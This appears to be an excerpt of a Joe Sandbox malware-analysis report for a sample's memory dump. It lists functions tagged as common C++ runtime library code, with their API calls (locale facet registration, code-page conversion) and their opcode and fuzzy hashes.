Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID: ;UJ
API String ID: 66001078-2260390652
Opcode ID: 90088a9a512649d0c7cb344410b423677041d1b8a0cf350087b0327b6dc65cae
Instruction ID: 2eb22711047881ed2e4e0630fe972131576853ba8dcefe860ff348f721c785e6
Opcode Fuzzy Hash: 90088a9a512649d0c7cb344410b423677041d1b8a0cf350087b0327b6dc65cae
Instruction Fuzzy Hash: 3241AB30900606EFCB20DF65C4949AAB3F8FF2A314B5A492BD556C3640D73CEA85CB6C

Function 004A842A Relevance: 10.6, APIs: 7, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A8431
std::_Lockit::_Lockit.LIBCPMT ref: 004A843B
int.LIBCPMT ref: 004A8452

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

numpunct.LIBCPMT ref: 004A8475
std::_Facet_Register.LIBCPMT ref: 004A848C
std::_Lockit::~_Lockit.LIBCPMT ref: 004A84AC
Concurrency::cancel_current_task.LIBCPMT ref: 004A84B9

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: c92eaa15b7b9d701b34df9b5247e05421e54c247e8f3510726af61f6998ce04d
Instruction ID: 2b1c091ee93e19c99f5aae217d439f43050bfcb1a24cc748332d634b1997b009
Opcode Fuzzy Hash: c92eaa15b7b9d701b34df9b5247e05421e54c247e8f3510726af61f6998ce04d
Instruction Fuzzy Hash: 8E112736900215ABDB00AFA5D805BAEFBB4FF65725F14001FF800AB391DF789E048B95

Function 004A3037 Relevance: 10.6, APIs: 7, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A303E
std::_Lockit::_Lockit.LIBCPMT ref: 004A3048
int.LIBCPMT ref: 004A305F

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

ctype.LIBCPMT ref: 004A3082
std::_Facet_Register.LIBCPMT ref: 004A3099
std::_Lockit::~_Lockit.LIBCPMT ref: 004A30B9
Concurrency::cancel_current_task.LIBCPMT ref: 004A30C6

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: d31fa578b156f7e7fdd0ca23275a4676a58c93e48c927b3604492d9914abf9b1
Instruction ID: 66c3301615ed263e7cd0a30cf1e270e44e1182f288f326a02ada90b426bfaeb2
Opcode Fuzzy Hash: d31fa578b156f7e7fdd0ca23275a4676a58c93e48c927b3604492d9914abf9b1
Instruction Fuzzy Hash: A011063A904218DBCB04EF64C8057AEBBA0AF65765F14404EF4006B392EF3C9E05CB89

Function 004B4AF4 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4AFB
std::_Lockit::_Lockit.LIBCPMT ref: 004B4B05
int.LIBCPMT ref: 004B4B1C

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

codecvt.LIBCPMT ref: 004B4B3F
std::_Facet_Register.LIBCPMT ref: 004B4B56
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4B76
Concurrency::cancel_current_task.LIBCPMT ref: 004B4B83

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 9bb0d9a7ff64457055ea425713087e894676138621b2673ee1751ef7671904ff
Instruction ID: ecdfa0cc81bc34d263a8452a26586f2e34279ddbf8a8d6b51e791123f3a6c934
Opcode Fuzzy Hash: 9bb0d9a7ff64457055ea425713087e894676138621b2673ee1751ef7671904ff
Instruction Fuzzy Hash: D801E13A9042198BCB04EF61D805BAE77B1AF94324F14004FF51067282DF38AE05CB99

Function 004B4B89 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B4B90
std::_Lockit::_Lockit.LIBCPMT ref: 004B4B9A
int.LIBCPMT ref: 004B4BB1

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

codecvt.LIBCPMT ref: 004B4BD4
std::_Facet_Register.LIBCPMT ref: 004B4BEB
std::_Lockit::~_Lockit.LIBCPMT ref: 004B4C0B
Concurrency::cancel_current_task.LIBCPMT ref: 004B4C18

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: d5618556c6e25753a6edaf732b7c4fa4a2debfee13a53e8ecab48d22a2cd7834
Instruction ID: 613b4b8e1154b790406e787c385739625c65919993c38aec291faf9a6fff9485
Opcode Fuzzy Hash: d5618556c6e25753a6edaf732b7c4fa4a2debfee13a53e8ecab48d22a2cd7834
Instruction Fuzzy Hash: A301043A9042158BCB04EB618805AAEBB70BFA4715F15000FF5006B382DF7C9E058BA8

Function 004A2FA2 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A2FA9
std::_Lockit::_Lockit.LIBCPMT ref: 004A2FB3
int.LIBCPMT ref: 004A2FCA

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

codecvt.LIBCPMT ref: 004A2FED
std::_Facet_Register.LIBCPMT ref: 004A3004
std::_Lockit::~_Lockit.LIBCPMT ref: 004A3024
Concurrency::cancel_current_task.LIBCPMT ref: 004A3031

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 0de348fea200fe30ec42d9612779eeb5aceb049f3955ac8ae0a66771998fe371
Instruction ID: 706230751025a9b90c3d5fb399e5221af7b078e2345684ed5b4be135ffe0ef2f
Opcode Fuzzy Hash: 0de348fea200fe30ec42d9612779eeb5aceb049f3955ac8ae0a66771998fe371
Instruction Fuzzy Hash: E9010835D002199BCB08EF959805AAD7770BF65715F14000FF4006B382FF389E05CB44

Function 004C31BD Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C31C4
std::_Lockit::_Lockit.LIBCPMT ref: 004C31CE
int.LIBCPMT ref: 004C31E5

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

messages.LIBCPMT ref: 004C3208
std::_Facet_Register.LIBCPMT ref: 004C321F
std::_Lockit::~_Lockit.LIBCPMT ref: 004C323F
Concurrency::cancel_current_task.LIBCPMT ref: 004C324C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: 4b0d193d04163bb9d32a7f60c03cf8306e35cc7c1f15185c07a3dfc4cb327882
Instruction ID: a8b175a01e5451b89dcab47b16a6b5ad75f7ee7ff9e7bc5ac7632fb05f707b40
Opcode Fuzzy Hash: 4b0d193d04163bb9d32a7f60c03cf8306e35cc7c1f15185c07a3dfc4cb327882
Instruction Fuzzy Hash: 5601E13A9002158BCB40FFA49845BAEB770AF65726F14404EF4006B292DF389F048B89

Function 004B5285 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B528C
std::_Lockit::_Lockit.LIBCPMT ref: 004B5296
int.LIBCPMT ref: 004B52AD

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

moneypunct.LIBCPMT ref: 004B52D0
std::_Facet_Register.LIBCPMT ref: 004B52E7
std::_Lockit::~_Lockit.LIBCPMT ref: 004B5307
Concurrency::cancel_current_task.LIBCPMT ref: 004B5314

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: c52fb46e839cd3904cb6aa14c2982d68c552642948b3d99a5a08428fc78d7fea
Instruction ID: 4cd171ac002199f69041ba6407c35fb4e2d7dc02b359af0236a5a8ed07a597a6
Opcode Fuzzy Hash: c52fb46e839cd3904cb6aa14c2982d68c552642948b3d99a5a08428fc78d7fea
Instruction Fuzzy Hash: 9801C8399006159BCB05FB659805BADB7B4BF54715F14004FF8006B392DF7C9E05CBA5

Function 004C337C Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C3383
std::_Lockit::_Lockit.LIBCPMT ref: 004C338D
int.LIBCPMT ref: 004C33A4

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

moneypunct.LIBCPMT ref: 004C33C7
std::_Facet_Register.LIBCPMT ref: 004C33DE
std::_Lockit::~_Lockit.LIBCPMT ref: 004C33FE
Concurrency::cancel_current_task.LIBCPMT ref: 004C340B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: d6c2b68e27e96aebff9a58bec5ebee3e73289a12d6b1b80736f55a042a45e5cc
Instruction ID: ed9e7b4d4a70d1153c506b5777f03ec3d175916da0274f0546534f27c4e6afd6
Opcode Fuzzy Hash: d6c2b68e27e96aebff9a58bec5ebee3e73289a12d6b1b80736f55a042a45e5cc
Instruction Fuzzy Hash: 2E01E17A9002158BCB45EF609846BBEB770AF64715F14404FF8116B292DF389F05CB89

Function 004B531A Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B5321
std::_Lockit::_Lockit.LIBCPMT ref: 004B532B
int.LIBCPMT ref: 004B5342

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

moneypunct.LIBCPMT ref: 004B5365
std::_Facet_Register.LIBCPMT ref: 004B537C
std::_Lockit::~_Lockit.LIBCPMT ref: 004B539C
Concurrency::cancel_current_task.LIBCPMT ref: 004B53A9

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 97ad93f93b60831bf988a9eff5e08db30c91d4406119a6e878ef4e5b3e45ad8e
Instruction ID: c1f254f8661e74b497556467ea33b691368dc3f6702988c176fe2c6d5b6232ca
Opcode Fuzzy Hash: 97ad93f93b60831bf988a9eff5e08db30c91d4406119a6e878ef4e5b3e45ad8e
Instruction Fuzzy Hash: 8C01047A900615CBCB04EB619815BAEB7B0BFA4355F14000FF811AB381DF7C9E05CBA8

Function 004B53AF Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B53B6
std::_Lockit::_Lockit.LIBCPMT ref: 004B53C0
int.LIBCPMT ref: 004B53D7

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

moneypunct.LIBCPMT ref: 004B53FA
std::_Facet_Register.LIBCPMT ref: 004B5411
std::_Lockit::~_Lockit.LIBCPMT ref: 004B5431
Concurrency::cancel_current_task.LIBCPMT ref: 004B543E

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 17c17af295b3639e4e07ab547862d7612eca221395ad85332eb2cf4f448a9c95
Instruction ID: 7b90aed2c02216d9cd03c04fa97e2bd738fc2ccbf644dd195eca1b703ea8c0ee
Opcode Fuzzy Hash: 17c17af295b3639e4e07ab547862d7612eca221395ad85332eb2cf4f448a9c95
Instruction Fuzzy Hash: 3E01043A9006159BCB00EB659905BEEB7B0BF54725F14000FF8006B391DF789E058B99

Function 004C3411 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C3418
std::_Lockit::_Lockit.LIBCPMT ref: 004C3422
int.LIBCPMT ref: 004C3439

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

moneypunct.LIBCPMT ref: 004C345C
std::_Facet_Register.LIBCPMT ref: 004C3473
std::_Lockit::~_Lockit.LIBCPMT ref: 004C3493
Concurrency::cancel_current_task.LIBCPMT ref: 004C34A0

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 42a87db942282d39fc684846f1fdc506372542a26e37c316de498d3085ec9b11
Instruction ID: 65c8563899a68260bb6896b6c5d94571812c8f7f5a71539666d7e493a7b7b1b5
Opcode Fuzzy Hash: 42a87db942282d39fc684846f1fdc506372542a26e37c316de498d3085ec9b11
Instruction Fuzzy Hash: 9701E17A9002159BCB05EF609905BBE77B4AFA171AF14404FF40067381DF389E048B89

Function 004B5698 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B569F
std::_Lockit::_Lockit.LIBCPMT ref: 004B56A9
int.LIBCPMT ref: 004B56C0

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

numpunct.LIBCPMT ref: 004B56E3
std::_Facet_Register.LIBCPMT ref: 004B56FA
std::_Lockit::~_Lockit.LIBCPMT ref: 004B571A
Concurrency::cancel_current_task.LIBCPMT ref: 004B5727

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: e010acc6702182e9d65e712c07133584c2ed691cbef4434250bc4f8e426e50a0
Instruction ID: fe3959cfbfc5101065a40a17669c3c77a5e158d83a14d9c27d7f82111951113e
Opcode Fuzzy Hash: e010acc6702182e9d65e712c07133584c2ed691cbef4434250bc4f8e426e50a0
Instruction Fuzzy Hash: B401A17AA006198BCB04EF659845BAEB770AF65719F14004FF4006B392DF789E058B99

Function 004B572D Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004B5734
std::_Lockit::_Lockit.LIBCPMT ref: 004B573E
int.LIBCPMT ref: 004B5755

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

numpunct.LIBCPMT ref: 004B5778
std::_Facet_Register.LIBCPMT ref: 004B578F
std::_Lockit::~_Lockit.LIBCPMT ref: 004B57AF
Concurrency::cancel_current_task.LIBCPMT ref: 004B57BC

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: bd3f94c30154ca779c2ce1077f8e3be364ef9aa5a250b8d14cc9e796133ca407
Instruction ID: cf87be7c6e4421c7fec13694a27d842a5d6b51e34e99b72fdb81eea613847a7a
Opcode Fuzzy Hash: bd3f94c30154ca779c2ce1077f8e3be364ef9aa5a250b8d14cc9e796133ca407
Instruction Fuzzy Hash: CF01A539900615DBCB04EB559855BEEB774AF54725F14044EF80067392DF389E058B99

Function 0051C38E Relevance: 9.2, APIs: 6, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,0051C65E,00000000,00000000,?,00000000,?,?,?,?,00000000,?), ref: 0051C434
__freea.LIBCMT ref: 0051C5C9
__freea.LIBCMT ref: 0051C5CF
__freea.LIBCMT ref: 0051C605
__freea.LIBCMT ref: 0051C60B
__freea.LIBCMT ref: 0051C61B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __freea$Info
String ID:
API String ID: 541289543-0
Opcode ID: af95488307ee8e9ecbe1e41f47d36425afc6e4baea9969837ede195f97afca9c
Instruction ID: e0262d791b2cc9ea0fbdfed2b630855207eda47b108b76489fb3e691b31678b2
Opcode Fuzzy Hash: af95488307ee8e9ecbe1e41f47d36425afc6e4baea9969837ede195f97afca9c
Instruction Fuzzy Hash: 077103769842066BFF209E548C41BFE7FBABF45315F250419E844A7281DB7BDC80C7A5

Function 004C7827 Relevance: 9.2, APIs: 6, Instructions: 225COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004C78B2
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004C793E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004C79A9
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004C79C5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004C7A28
CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004C7A45

Memory Dump Source

